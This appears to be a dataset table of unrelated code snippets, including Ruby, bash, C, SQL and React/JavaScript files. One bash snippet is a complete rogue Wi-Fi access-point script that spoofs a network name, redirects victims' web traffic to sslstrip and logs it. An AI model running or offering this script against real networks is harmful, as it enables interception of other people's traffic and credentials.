text stringlengths 1 1.05M |
|---|
# Computes the area of a triangle from its three side lengths using
# Heron's formula and prints the result.
#
# BUG FIX: the semi-perimeter must be computed with float division;
# with Integer arguments `(a + b + c) / 2` truncates in Ruby and the
# reported area is wrong (e.g. sides 3,4,5 gave 5.66 instead of 6.0).
def area_of_triangle(a, b, c)
# calculate the semi-perimeter (2.0 forces float division)
s = (a + b + c) / 2.0
# calculate the area via Heron's formula
area = Math.sqrt(s * (s - a) * (s - b) * (s - c))
puts "The area of the triangle is #{area}"
end
#!/usr/bin/env bash
# (C) Sergey Tyurin 2022-04-28 19:00:00
# Disclaimer
##################################################################################################################
# You running this script/function means you will not blame the author(s)
# if this breaks your stuff. This script/function is provided AS IS without warranty of any kind.
# Author(s) disclaim all implied warranties including, without limitation,
# any implied warranties of merchantability or of fitness for a particular purpose.
# The entire risk arising out of the use or performance of the sample scripts and documentation remains with you.
# In no event shall author(s) be held liable for any damages whatsoever
# (including, without limitation, damages for loss of business profits, business interruption,
# loss of business information, or other pecuniary loss) arising out of the use of or inability
# to use the script or documentation. Neither this script/function,
# nor any part of it other than those parts that are explicitly copied from others,
# may be republished without author(s) express written permission.
# Author(s) retain the right to alter this disclaimer at any time.
##################################################################################################################
################################################################################################
# NB! This update script will work correctly only if RNODE_GIT_COMMIT="master" in env.sh ! ! !
# In other case, you have to update node manually ! ! !
################################################################################################
echo
echo "#################################### Full update Script ########################################"
echo "INFO: $(basename "$0") BEGIN $(date +%s) / $(date +'%F %T %Z')"
# Resolve the directory this script lives in (modernized from backticks to $()).
SCRIPT_DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd -P)
source "${SCRIPT_DIR}/env.sh"
# exitVar records a bad flag value from env.sh.
# NOTE(review): exitVar is assigned below but never checked afterwards in
# this script - confirm whether an early bail-out was intended.
exitVar=0
# Case-insensitive compares so "True"/"TRUE" in env.sh also count as true.
shopt -s nocasematch
# FIX: the original tested `[[ ! -z VAR || -n VAR ]]`; both operands are the
# same check, so a single `-n` test is equivalent and clearer.
if [[ -n ${Enable_Node_Autoupdate} ]]
then
if [[ ${Enable_Node_Autoupdate} != "true" ]]
then
exitVar=1
else
myNodeAutoupdate=1
fi
fi
if [[ -n ${Enable_Scripts_Autoupdate} ]]
then
if [[ ${Enable_Scripts_Autoupdate} != "true" ]]
then
exitVar=2
else
myScriptsAutoupdate=1
fi
fi
if [[ -n ${newReleaseSndMsg} ]]
then
if [[ ${newReleaseSndMsg} != "true" ]]
then
exitVar=3
else
myNewReleaseSndMsg=1
fi
fi
shopt -u nocasematch
#===========================================================
# Get scripts update info
# Local HEAD of the scripts checkout (repo root is one level above SCRIPT_DIR).
Custler_Scripts_local_commit="$(git --git-dir="${SCRIPT_DIR}/../.git" rev-parse HEAD 2>/dev/null)"
# HEAD commit advertised by the configured remote for the same repository.
Custler_Scripts_remote_commit="$(git --git-dir="${SCRIPT_DIR}/../.git" ls-remote 2>/dev/null | grep 'HEAD'|awk '{print $1}')"
if [[ -z $Custler_Scripts_local_commit ]];then
echo "###-ERROR(line $LINENO): Cannot get LOCAL Scripts commit!"
exit 1
fi
if [[ -z $Custler_Scripts_remote_commit ]];then
echo "###-ERROR(line $LINENO): Cannot get REMOTE Scripts commit!"
exit 1
fi
###############################################################
#===========================================================
# Warn the operator (and optionally Telegram) when the remote repo has
# commits that the local checkout does not.
if [[ "$Custler_Scripts_local_commit" != "$Custler_Scripts_remote_commit" ]]
then
echo '---WARN: Set Enable_Node_Autoupdate to true in env.sh for automatically security updates!! If you fully trust me, you can enable autoupdate scripts in env.sh by set variable "Enable_Scripts_Autoupdate" to "true"'
if [[ $myNewReleaseSndMsg -eq 1 ]]
then
# FIX: `2>&1 > /dev/null` sent stderr to the terminal and discarded only
# stdout; `> /dev/null 2>&1` silences both streams, as intended.
# NOTE(review): the literal `+` between "$Tg_Warn_sign" and the quoted text
# is sent as part of the message - confirm whether it is intended.
"${SCRIPT_DIR}/Send_msg_toTelBot.sh" "$HOSTNAME Server" "$Tg_Warn_sign"+'WARN: Security info! **NEW** release arrived! But Enable_Node_Autoupdate setted to false and you should upgrade node manually as fast as you can! If you fully trust me, you can enable autoupdate scripts in env.sh by set variable "Enable_Scripts_Autoupdate" to "true"' > /dev/null 2>&1
fi
fi
# Update env.sh for new security update
# ok, here we use force to set autoupdate, strannen'ko =)
# sed -i.bak 's/Enable_Autoupdate=.*/Enable_Node_Autoupdate=true # will automatically update rnode, rconsole, tonos-cli etc../' "${SCRIPT_DIR}/env.sh"
# sed -i.bak '/Enable_Node_Autoupdate/a Enable_Scripts_Autoupdate=false # Updating scripts. NB! Change it to true if you fully trust me ONLY!!' "${SCRIPT_DIR}/env.sh"
#===========================================================
# Update scripts, if enabled, or send msg re update
if [[ ${myScriptsAutoupdate} -eq 1 ]]
then
if [[ "$Custler_Scripts_local_commit" == "$Custler_Scripts_remote_commit" ]];then
echo "---INFO: Scripts is up to date"
else
if $Enable_Scripts_Autoupdate ;then
echo "---INFO: SCRIPTS going to update from $Custler_Scripts_local_commit to new commit $Custler_Scripts_remote_commit"
if [[ $myNewReleaseSndMsg -eq 1 ]]; then
"${SCRIPT_DIR}/Send_msg_toTelBot.sh" "$HOSTNAME Server" "$Tg_Warn_sign INFO: SCRIPTS going to update from $Custler_Scripts_local_commit to new commit $Custler_Scripts_remote_commit" 2>&1 > /dev/null
fi
Remote_Repo_URL="$(git remote show origin | grep 'Fetch URL' | awk '{print $3}')"
echo "---INFO: Update scripts from repo $Remote_Repo_URL"
#=======================================
mkdir -p ${HOME}/Custler_tmp
cp -f ${SCRIPT_DIR}/env.sh ${HOME}/Custler_tmp/
cp -f ${SCRIPT_DIR}/TlgChat.json ${HOME}/Custler_tmp/
cp -f ${SCRIPT_DIR}/RC_Addr_list.json ${HOME}/Custler_tmp/
git reset --hard
git pull --ff-only
cp -f ${HOME}/Custler_tmp/env.sh ${SCRIPT_DIR}/
cp -f ${HOME}/Custler_tmp/TlgChat.json ${SCRIPT_DIR}/
cp -f ${HOME}/Custler_tmp/RC_Addr_list.json ${SCRIPT_DIR}/
#=======================================
cat ${SCRIPT_DIR}/Update_Info.txt
echo
echo "---INFO: SCRIPTS updated. Files env.sh TlgChat.json RC_Addr_list.json keeped."
if [[ $myNewReleaseSndMsg -eq 1 ]]; then
"${SCRIPT_DIR}/Send_msg_toTelBot.sh" "$HOSTNAME Server" "$Tg_CheckMark $(cat ${SCRIPT_DIR}/Update_Info.txt)" 2>&1 > /dev/null
"${SCRIPT_DIR}/Send_msg_toTelBot.sh" "$HOSTNAME Server" "$Tg_CheckMark INFO: SCRIPTS updated. Files env.sh TlgChat.json RC_Addr_list.json keeped." 2>&1 > /dev/null
fi
else
echo '---WARN: Scripts repo was updated. Please check it and update by hand. If you fully trust me, you can enable autoupdate scripts in env.sh by set variable "Enable_Scripts_Autoupdate" to "true"'
if [[ $myNewReleaseSndMsg -eq 1 ]]; then
"${SCRIPT_DIR}/Send_msg_toTelBot.sh" "$HOSTNAME Server" "$Tg_Warn_sign"+'WARN: Scripts repo was updated. Please check it and update. If you fully trust me, you can enable autoupdate scripts in env.sh by set variable "Enable_Scripts_Autoupdate" to "true"' 2>&1 > /dev/null
fi
fi
fi
fi
#===========================================================
# Update NODE
${SCRIPT_DIR}/Update_Node_to_new_release.sh
#################################################################
# NB!! This section shoul be run once only with rnode commit 5494f43cf80e071f6e10257ef4901568d10b2385 only
Node_local_commit="$(git --git-dir="$RNODE_SRC_DIR/.git" rev-parse HEAD 2>/dev/null)"
# One-shot DB restore: guarded by a marker file so it runs a single time.
if [[ ! -f ${SCRIPT_DIR}/rnode_commit_5494f43_DB_Restored ]] && [[ ${Node_local_commit} == "5494f43cf80e071f6e10257ef4901568d10b2385" ]];then
echo "${Tg_Warn_sign}---WARN: Node going to RESTORE DataBase. It is once for commit 5494f43. Approx ONE hour the node will looks like DOWN and UNSYNCED!"
# FIX: `> /dev/null 2>&1` silences both streams; the original
# `2>&1 > /dev/null` leaked stderr to the terminal.
"${SCRIPT_DIR}/Send_msg_toTelBot.sh" "$HOSTNAME Server" "${Tg_Warn_sign}---WARN: Node going to RESTORE DataBase. It is once for commit 5494f43. Approx ONE hour the node will looks like DOWN and UNSYNCED!" > /dev/null 2>&1
#===============================
# Toggle restore_db in the node config via a temp file (jq cannot edit in place).
sudo service ${ServiceName} stop
jq ".restore_db = true" ${R_CFG_DIR}/config.json > ${R_CFG_DIR}/config.json.tmp
mv -f ${R_CFG_DIR}/config.json.tmp ${R_CFG_DIR}/config.json
sudo service ${ServiceName} start
${SCRIPT_DIR}/wait_for_sync.sh
jq ".restore_db = false" ${R_CFG_DIR}/config.json > ${R_CFG_DIR}/config.json.tmp
mv -f ${R_CFG_DIR}/config.json.tmp ${R_CFG_DIR}/config.json
#===============================
touch ${SCRIPT_DIR}/rnode_commit_5494f43_DB_Restored
echo "${Tg_Warn_sign}---INFO: DB restored. Node should be SYNCED!"
"${SCRIPT_DIR}/Send_msg_toTelBot.sh" "$HOSTNAME Server" "${Tg_Warn_sign}---INFO: DB restored. Node should be SYNCED!" > /dev/null 2>&1
fi
#################################################################
echo "+++INFO: $(basename "$0") FINISHED $(date +%s) / $(date +'%F %T %Z')"
echo "================================================================================================"
exit 0
|
<reponame>leshiguang/LZUISDK
//
// LSDScreenDisplay.h
// LSBluetooth-Library
//
// Created by lifesense on 16/8/1.
// Copyright © 2016年 Lifesense. All rights reserved.
//
#import "LSDBaseModel.h"
#import "LSConst.h"
// Model object describing a device's screen-display configuration.
@interface LSDScreenDisplay : LSDBaseModel
// NOTE(review): `screeWay` looks like a typo for `screenWay`, but renaming
// would break existing callers and KVC/serialization keys - flagged only.
@property (nonatomic, assign) ScreenWay screeWay;
@end
|
-- Fetch every column for people records at the given street address.
-- NOTE(review): `SELECT *` is fragile under schema changes; list the needed
-- columns explicitly once they are known.
SELECT * FROM people
WHERE address = '10 Main Street';
#!/bin/bash
# Launch a jaxnerf training job under blaze with optimized compilation.
# Any extra command-line arguments are forwarded to the trainer via "$@".
blaze run \
--compilation_mode=opt \
--define=PYTYPE=TRUE \
--symlink_prefix=/ -- \
experimental/users/daeyun/jaxnerf/train \
--logtostderr \
--data_dir="/cns/lu-d/home/daeyun/shapenet/v2/train/00002/" \
--train_dir="/cns/lu-d/home/daeyun/checkpoints/shapenet/v2/0002/" \
--config=jaxnerf/configs/shapenet_base \
"$@"
|
<reponame>muthukumaravel7/armnn
// Auto-generated Doxygen navigation data for ClConvolution2dWorkload.cpp:
// maps each documented symbol to its anchor in the generated XHTML page.
// Do not edit by hand - regenerate with Doxygen instead.
var _cl_convolution2d_workload_8cpp =
[
    [ "ClConvolution2dWorkloadValidate", "_cl_convolution2d_workload_8cpp.xhtml#acd1146eb56f1473a0bf4561bcc1d1529", null ]
];
def fast_operation(n):
    """Return the sum 0 + 1 + ... + n in O(1) time.

    Uses Gauss' closed-form formula ``n * (n + 1) // 2`` with integer
    (floor) division, so an int input always yields an int result.

    Args:
        n: Inclusive upper bound of the summation.

    Returns:
        The arithmetic-series sum as an integer.
    """
    # Closed form avoids an O(n) loop; no temporary needed.
    return (n * (n + 1)) // 2
# Copyright (c) 2010 The Chromium OS Authors. All rights reserved.
# Copyright (c) 2013 The CoreOS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# The GCC package includes both its libraries and the compiler.
# In prod images we only need the shared libraries.
# Extract only GCC's shared libraries (not the compiler) from the binary
# package into the prod image rootfs, then mark the package as provided.
# $1: root filesystem directory of the image being built.
extract_prod_gcc() {
local root_fs_dir="$1"; shift
local gcc=$(portageq-${BOARD} best_version "${BOARD_ROOT}" sys-devel/gcc)
local pkg="$(portageq-${BOARD} pkgdir)/${gcc}.tbz2"
if [[ ! -f "${pkg}" ]]; then
die "Binary package missing: $pkg"
fi
# Normally GCC's shared libraries are installed to:
#   /usr/lib/gcc/x86_64-cros-linux-gnu/$version/*
# Instead we extract them to plain old /usr/lib
qtbz2 -O -t "${pkg}" | \
sudo tar -C "${root_fs_dir}" -xj \
--transform 's#/usr/lib/.*/#/usr/lib/#' \
--wildcards './usr/lib/gcc/*.so*'
package_provided "${gcc}"
}
# Build a production image: minimal GCC libs, the given base package set,
# package/license manifests, official-key check, and final cleanup.
# $1: image file name  $2: disk layout  $3: update group  $4: base package
create_prod_image() {
local image_name="$1"
local disk_layout="$2"
local update_group="$3"
local base_pkg="$4"
if [ -z "${base_pkg}" ]; then
echo "did not get base package!"
exit 1
fi
info "Building production image ${image_name}"
local root_fs_dir="${BUILD_DIR}/rootfs"
local image_contents="${image_name%.bin}_contents.txt"
local image_packages="${image_name%.bin}_packages.txt"
local image_licenses="${image_name%.bin}_licenses.txt"
start_image "${image_name}" "${disk_layout}" "${root_fs_dir}" "${update_group}"
# Install minimal GCC (libs only) and then everything else
set_image_profile prod
extract_prod_gcc "${root_fs_dir}"
emerge_to_image "${root_fs_dir}" "${base_pkg}"
run_ldconfig "${root_fs_dir}"
write_packages "${root_fs_dir}" "${BUILD_DIR}/${image_packages}"
write_licenses "${root_fs_dir}" "${BUILD_DIR}/${image_licenses}"
extract_docs "${root_fs_dir}"
# Assert that if this is supposed to be an official build that the
# official update keys have been used.
if [[ ${COREOS_OFFICIAL:-0} -eq 1 ]]; then
grep -q official \
"${root_fs_dir}"/var/db/pkg/coreos-base/coreos-au-key-*/USE \
|| die_notrace "coreos-au-key is missing the 'official' use flag"
fi
# clean-ups of things we do not need
sudo rm ${root_fs_dir}/etc/csh.env
sudo rm -rf ${root_fs_dir}/etc/env.d
sudo rm -rf ${root_fs_dir}/var/db/pkg
# Move the ld.so configs into /usr so they can be symlinked from /
sudo mv ${root_fs_dir}/etc/ld.so.conf ${root_fs_dir}/usr/lib
sudo mv ${root_fs_dir}/etc/ld.so.conf.d ${root_fs_dir}/usr/lib
sudo ln --symbolic ../usr/lib/ld.so.conf ${root_fs_dir}/etc/ld.so.conf
# Add a tmpfiles rule that symlink ld.so.conf from /usr into /
sudo tee "${root_fs_dir}/usr/lib64/tmpfiles.d/baselayout-ldso.conf" \
> /dev/null <<EOF
L+ /etc/ld.so.conf - - - - ../usr/lib/ld.so.conf
EOF
finish_image "${image_name}" "${disk_layout}" "${root_fs_dir}" "${image_contents}"
upload_image -d "${BUILD_DIR}/${image_name}.bz2.DIGESTS" \
"${BUILD_DIR}/${image_contents}" \
"${BUILD_DIR}/${image_packages}" \
"${BUILD_DIR}/${image_name}"
}
|
#!/usr/bin/env bash
# Echoes 2 if git fails with exit code 128 (e.g. no tag / not a repo),
# 1 if some commit message since the last tag matches $1, 0 otherwise.
function grep_word_from_git_commits_since_last_tag() {
# BUG FIX: `local commits=$(cmd)` makes $? the exit status of `local`
# itself (always 0), never of the command substitution. Declare first,
# then assign, so git's real exit status is observed below.
local commits
commits=$(git log --oneline $(git describe --tags --abbrev=0 @^)..@ --grep="$1" 2> /dev/null)
if [ $? -eq 128 ]; then
echo 2
elif [ -z "$commits" ];
then
echo 0
else
echo 1
fi
}
# Decide the semver bump level from commit messages since the last tag:
# "minor" when both a BREAKING CHANGE and a Feat commit exist, else "patch".
function get_version() {
##
# TODO: Comment out this code when packages are stable
# if [ `grep_word_from_git_commits_since_last_tag "BREAKING CHANGE"` -gt 0 ]
# then
# echo "major"
# elif [ `grep_word_from_git_commits_since_last_tag "Feat"` -gt 0 ]
# The packages are still unstable so we update only 0.x.x versions (minor and patch)
# however breaking changes are still documented in the changelog
# NOTE(review): requiring BOTH "BREAKING CHANGE" and "Feat" (&&) means a
# breaking change alone only bumps patch - confirm `||` was not intended.
if [ `grep_word_from_git_commits_since_last_tag "BREAKING CHANGE"` -gt 0 ] && [ `grep_word_from_git_commits_since_last_tag "Feat"` -gt 0 ]
then
echo "minor"
else
echo "patch"
fi
}
# Print the chosen bump level to stdout for the caller.
get_version
|
#!/bin/sh
#
# main run
#
# Helm-templated entrypoint for the CENM zone service: all {{ .Values.* }}
# placeholders are substituted by Helm before this script ever executes.
# NOTE(review): the database password is passed as a command-line argument,
# which is visible in the process list - confirm this is acceptable here.
if [ -f {{ .Values.config.zoneJar.path }}/zone.jar ]
then
echo
echo "CENM: starting up zone process ..."
echo
set -x
java -jar {{ .Values.config.zoneJar.path }}/zone.jar \
--user "{{ .Values.database.user }}" \
--password "{{ .Values.database.password }}" \
--url "{{ .Values.database.url }}" \
--driver-class-name "{{ .Values.database.driverClassName }}" \
--jdbc-driver "{{ .Values.database.jdbcDriver }}" \
--enm-listener-port "{{ .Values.listenerPort.enm }}" \
--admin-listener-port "{{ .Values.listenerPort.admin }}" \
--auth-host "{{ .Values.cenmServices.authName }}.{{ .Values.metadata.namespace }}" \
--auth-port "{{ .Values.cenmServices.authPort }}" \
--auth-trust-store-location ./DATA/trust-stores/corda-ssl-trust-store.jks \
--auth-trust-store-password "SSL_TRUSTSTORE" \
--auth-issuer "http://test" \
--auth-leeway 5 \
--run-migration="{{ .Values.database.runMigration }}" \
--tls=true \
--tls-keystore=./DATA/key-stores/corda-ssl-identity-manager-keys.jks \
--tls-keystore-password="IDMAN_SSL" \
--tls-truststore=./DATA/trust-stores/corda-ssl-trust-store.jks \
--tls-truststore-password="SSL_TRUSTSTORE" \
--verbose
EXIT_CODE=${?}
else
echo "Missing zone jar file in {{ .Values.config.zoneJar.path }} directory:"
ls -al {{ .Values.config.zoneJar.path }}
EXIT_CODE=110
fi
|
<gh_stars>10-100
#ifndef SIGNAL_HPP_
#define SIGNAL_HPP_
//============================================================================
// Name :
// Author : Avi
// Revision : $Revision: #7 $
//
// Copyright 2009-2020 ECMWF.
// This software is licensed under the terms of the Apache Licence version 2.0
// which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
// In applying this licence, ECMWF does not waive the privileges and immunities
// granted to it by virtue of its status as an intergovernmental organisation
// nor does it submit to any jurisdiction.
//
// Description : During destruction will un-block SIGCHILD and then reblock
// During job generation we want to avoid being notified of
// of child process termination.
// We want to control when child process termination is handled
// Collaboration: System.hpp
//============================================================================
namespace ecf {
// Scoped guard for SIGCHLD handling (see the file header): per the class
// contract, the destructor briefly UNBLOCKs SIGCHLD so pending child
// terminations are handled, then re-BLOCKs it. Collaborates with System.hpp.
class Signal {
private:
// Non-copyable: copying a signal-mask guard would double the side effects.
Signal(const Signal&) = delete;
const Signal& operator=(const Signal&) = delete;
public:
Signal();
/// UNBLOCK SIGCHLD at start of destructor
/// BLOCK SIGCHLD and the end of the destructor
/// During the gap in between handle process termination
~Signal();
// Add / remove SIGCHLD from the process's blocked-signal set.
static void block_sigchild();
static void unblock_sigchild();
};
}
#endif
|
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
/* Rock-paper-scissors vs the computer. Encoding: 1 = rock, 2 = paper,
 * 3 = scissors. Returns 0 on a completed game, 1 on invalid input. */
int main() {
    int player1, player2;
    /* seed random number generator so player 2 varies between runs */
    srand(time(0));
    printf("Let's play rock, paper, scissors\n");
    printf("-------------------------------\n");
    /* Player 1 */
    printf("Player 1 enters choice: ");
    if (scanf("%d", &player1) != 1 || player1 < 1 || player1 > 3) {
        /* Robustness fix: reject non-numeric or out-of-range input instead
         * of comparing an indeterminate value below. */
        printf("Invalid choice. Enter 1 (rock), 2 (paper) or 3 (scissors).\n");
        return 1;
    }
    /* Player 2 picks uniformly from 1..3 */
    player2 = rand() % 3 + 1;
    printf("Player 2 chooses %d\n", player2);
    /* Determine winner: 1 beats 3, 2 beats 1, 3 beats 2 */
    if (player1 == player2) {
        printf("It's a tie!\n");
    } else if (player1 == 1 && player2 == 3) {
        /* BUG FIX: this branch is rock vs scissors; the original printed
         * "Paper beats rock. Player 1 wins." here. */
        printf("Rock beats scissors. Player 1 wins.\n");
    } else if (player1 == 2 && player2 == 1) {
        printf("Paper beats rock. Player 1 wins.\n");
    } else if (player1 == 3 && player2 == 2) {
        printf("Scissors beats paper. Player 1 wins.\n");
    } else {
        printf("Player 2 wins.\n");
    }
    return 0;
}
<reponame>bizmaercq/eda-reporting
-- All ledger entries for the two listed account numbers, excluding rows
-- flagged ib = 'Y', within the given posting-date window.
-- NOTE(review): the date bounds are plain string literals, so this relies on
-- the session's implicit date format (looks like DD/MM/YYYY) - confirm, and
-- prefer explicit TO_DATE(...) conversions.
select *
from acvw_all_ac_entries
where ac_no in ('452101000','451101000')
and nvl(ib,'X')<>'Y'
and trn_dt between '01/04/2014' and '31/05/2014'
|
# Load shared helpers, configure the project quietly, then run `echo`
# through `cabal exec` to exercise argument passing in the cabal sandbox.
. ./common.sh
cabal configure > /dev/null
cabal exec echo this string
|
import React, { useEffect, useState, useCallback, Suspense } from "react";
import GitHub from "github-api";
import config from "./config";
import "./App.css";
import UserDetails from "./UserDetails";
import LoginSearch from "./LoginSearch";
import CircularProgress from "@material-ui/core/CircularProgress";
const RepoList = React.lazy(() => import("./RepoList"));
const gh = new GitHub({
token: config.token
});
function App() {
const [isLoading, setIsLoading] = useState(false);
const [user, setUser] = useState(null);
const [repos, setRepos] = useState([]);
useEffect(() => {}, []);
const onSearch = useCallback(async value => {
setIsLoading(true);
const user = gh.getUser(value);
try {
const userResponse = await user.getProfile();
const reposResponse = await user.listRepos();
setUser(userResponse.data);
setRepos(
reposResponse.data
.filter(r => r.owner.login === value)
.map(r => ({
id: r.id,
name: r.name,
language: r.language
}))
);
} catch (error) {
setUser(null);
setRepos([]);
alert(`User '${value}' not found`);
} finally {
setIsLoading(false);
}
}, []);
return (
<div className="App">
<header className="App-header">
<p>
<code>GitHub Browser</code>
</p>
</header>
<LoginSearch onSearch={onSearch} />
{isLoading && (
<div>
<CircularProgress />
</div>
)}
{!isLoading && user != null && (
<UserDetails user={user} onReposClick={null} />
)}
<Suspense fallback={<CircularProgress style={{ marginTop: "1rem" }} />}>
{!isLoading && repos.length > 0 && <RepoList repos={repos} />}
</Suspense>
</div>
);
}
export default App;
|
<gh_stars>1-10
const mongoose = require('mongoose')
const RegistrationSchema = new mongoose.Schema({
date: () => Date.now(),
approved: Boolean,
owner: String,
eventTitle: String,
eventPrice: String,
userEmail: String,
eventDate: String,
user: {
type: mongoose.Schema.Types.ObjectId,
ref: 'User',
},
event: {
type: mongoose.Schema.Types.ObjectId,
ref: 'Event',
},
})
module.exports = mongoose.model(
'Registration',
RegistrationSchema,
'registrations'
)
|
#!/bin/bash
# Stands up a rogue wireless AP (airbase-ng) with DHCP, NAT and sslstrip.
# NOTE: offensive-security lab tooling - run only on networks you are
# explicitly authorized to test.
#____[start of config]_________________________
# these two values can be overwritten using
# arguments to the command
essid="mylinksys"
channel="11"
subnet="192.168.100.0"
startip="192.168.100.100"
endip="192.168.100.200"
broadcast="192.168.100.255"
router="192.168.100.1"
netmask="255.255.255.0"
dns="8.8.8.8"
#____[end of config]___________________________
# override the default essid if one is provided
if [[ ! -z ${1} ]]; then
essid="${1}"
fi
# override the default channel if one is provided
if [[ ! -z ${2} ]]; then
channel="${2}"
fi
# Flush all filter and NAT rules/chains back to empty defaults.
function clear_iptables {
iptables --flush
iptables --table nat --flush
iptables --table nat --delete-chain
iptables --delete-chain
}
# Tear everything down (processes, temp files, interface, rules) on Ctrl-C.
function cleanup {
echo "* cleaning up"
killall sslstrip
killall dhcpd3
rm -rf /tmp/dhcpd
rm -f /tmp/dhcpd.conf
ifconfig at0 down
killall airbase-ng
clear_iptables
echo "* end of script"
exit 0
}
trap cleanup INT
echo "* creating dummy dhcpd.conf"
cat << EOF > /tmp/dhcpd.conf
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet ${subnet} netmask ${netmask} {
option subnet-mask ${netmask};
option broadcast-address ${broadcast};
option routers ${router};
option domain-name-servers ${dns};
range ${startip} ${endip};
}
EOF
echo "* starting airbase-ng essid ${essid} on channel ${channel}"
airbase-ng -e "${essid}" -q -c ${channel} mon0 &
sleep 3
echo "* spoofing MAC address for at0"
ifconfig at0 down
macchanger -a at0
echo "* bringing up at0 and setting route"
ifconfig at0 up
ifconfig at0 ${router} netmask ${netmask}
route add -net ${subnet} netmask ${netmask} gw ${router}
echo "* starting dhcpd3"
mkdir -p /tmp/dhcpd
touch /tmp/dhcpd/dhcpd.leases
chown -R dhcpd:dhcpd /tmp/dhcpd
dhcpd3 -q -cf /tmp/dhcpd.conf -pf /tmp/dhcpd/dhcpd.pid -lf /tmp/dhcpd/dhcpd.leases at0
echo "* setting up forwarding rules"
clear_iptables
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
mygw=$(grep nameserver /etc/resolv.conf | head -1 | cut -d" " -f2)
echo "* using ${mygw} as gateway"
iptables --table nat --append PREROUTING --protocol udp --dport 53 -j DNAT --to ${mygw}
# NOTE(review): this deletes rule #1 of the nat PREROUTING chain - after the
# clear_iptables above that is the DNAT rule just appended. Confirm intent.
iptables -t nat -D PREROUTING 1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
ssslog="sslstrip.${RANDOM}"
echo "* starting sslstrip and logging results to ${ssslog}"
sslstrip -f -k -w ${ssslog} &
echo "* setup complete, now we wait for victims!"
# Idle loop; cleanup happens via the INT trap above.
while :; do
sleep 60
done;
|
// Licensed under the Apache License, Version 2.0 (the "License"); you may not
// use this file except in compliance with the License. You may obtain a copy of
// the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
// WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
// License for the specific language governing permissions and limitations under
// the License.
import FauxtonAPI from '../../../core/api';
import app from '../../../app';
import PropTypes from 'prop-types';
import React from 'react';
import GeneralComponents from '../../components/react-components';
import IndexEditorComponents from '../../documents/index-editor/components';
import Analyzer from './Analyzer';
const DesignDocSelector = IndexEditorComponents.DesignDocSelector;
// Editor page for creating or editing a CouchDB search index: design-doc
// selector, index name, index-function code editor and analyzer settings.
// Child sections expose validate()/getInfo()/getValue() via refs.
export default class SearchIndexEditor extends React.Component {
static defaultProps = {
isCreatingIndex: true,
blur: function () { },
isLoading: true
};
static propTypes = {
isLoading: PropTypes.bool,
isCreatingIndex: PropTypes.bool,
database: PropTypes.object.isRequired,
saveDoc: PropTypes.object.isRequired,
newDesignDocName: PropTypes.string,
blur: PropTypes.func,
setSearchIndexName: PropTypes.func.isRequired,
searchIndexFunction: PropTypes.string.isRequired,
saveSearchIndex: PropTypes.func.isRequired,
selectDesignDoc: PropTypes.func.isRequired,
updateNewDesignDocName: PropTypes.func.isRequired
};
// Controlled-input handler for the index-name field.
updateSearchIndexName = (e) => {
this.props.setSearchIndexName(e.target.value);
};
// Validates all form sections, then delegates the save to props with the
// redirect URL to show after a successful save.
saveIndex = (e) => {
e.preventDefault();
// pass off validation work to the individual form sections
if (!this.designDocSelector.validate() || !this.analyzer.validate()) {
return;
}
if (!this.props.searchIndexName.trim()) {
FauxtonAPI.addNotification({
msg: 'Please enter the index name.',
type: 'error',
clear: true
});
return;
}
// Strip the "_design/" prefix before building the fragment URL.
const dDocNameClean = this.props.saveDoc.id.replace(/_design\//, '');
const encodedPartKey = this.props.partitionKey ? encodeURIComponent(this.props.partitionKey) : '';
const url = FauxtonAPI.urls('search', 'fragment', encodeURIComponent(this.props.database.id), encodedPartKey,
encodeURIComponent(dDocNameClean), encodeURIComponent(this.props.searchIndexName));
this.props.saveSearchIndex(this.props.saveDoc, {
isCreatingIndex: this.props.isCreatingIndex,
indexName: this.props.searchIndexName,
designDocs: this.props.designDocs,
database: this.props.database,
indexFunction: this.getIndexFunction(),
analyzerInfo: this.analyzer.getInfo(),
lastSavedSearchIndexName: this.props.lastSavedSearchIndexName,
lastSavedDesignDocName: this.props.lastSavedDesignDocName
}, url);
};
// Reads the current index-function source out of the code editor ref.
getIndexFunction = () => {
return this.searchIndexEditor.getValue();
};
getDesignDocList = () => {
return this.props.designDocs.map(function (doc) {
return doc.id;
});
};
// Cancel goes back to all-docs for brand-new indexes, otherwise to the
// last-saved index view.
getCancelLink() {
const encodedDatabase = encodeURIComponent(this.props.database.id);
const encodedPartitionKey = this.props.partitionKey ? encodeURIComponent(this.props.partitionKey) : '';
if (!this.props.lastSavedDesignDocName || this.props.isCreatingIndex) {
return '#' + FauxtonAPI.urls('allDocs', 'app', encodedDatabase, encodedPartitionKey);
}
const encodedDDoc = app.utils.getSafeIdForDoc(this.props.lastSavedDesignDocName);
const encodedIndex = encodeURIComponent(this.props.lastSavedSearchIndexName);
return '#' + FauxtonAPI.urls('search', 'showIndex', encodedDatabase,
encodedPartitionKey, encodedDDoc, encodedIndex);
}
render() {
if (this.props.isLoading) {
return (
<div className="search-index-page-loading">
<GeneralComponents.LoadLines />
</div>
);
}
// If failed to load
if (!this.props.database) {
return null;
}
const pageHeader = this.props.isCreatingIndex ? 'New Search Index' : 'Edit Search Index';
const btnLabel = this.props.isCreatingIndex ? 'Create Document and Build Index' : 'Save Document and Build Index';
return (
<form className="form-horizontal search-query-save" id="search-index">
<h3 className="simple-header">{pageHeader}</h3>
<DesignDocSelector
ref={node => this.designDocSelector = node}
designDocLabel="Save to design document"
designDocList={this.getDesignDocList()}
isDbPartitioned={this.props.isDbPartitioned}
newDesignDocName={this.props.newDesignDocName}
newDesignDocPartitioned={this.props.newDesignDocPartitioned}
selectedDesignDocName={this.props.ddocName}
selectedDesignDocPartitioned={this.props.ddocPartitioned}
onSelectDesignDoc={this.props.selectDesignDoc}
onChangeNewDesignDocName={this.props.updateNewDesignDocName}
onChangeNewDesignDocPartitioned={this.props.updateNewDesignDocPartitioned}
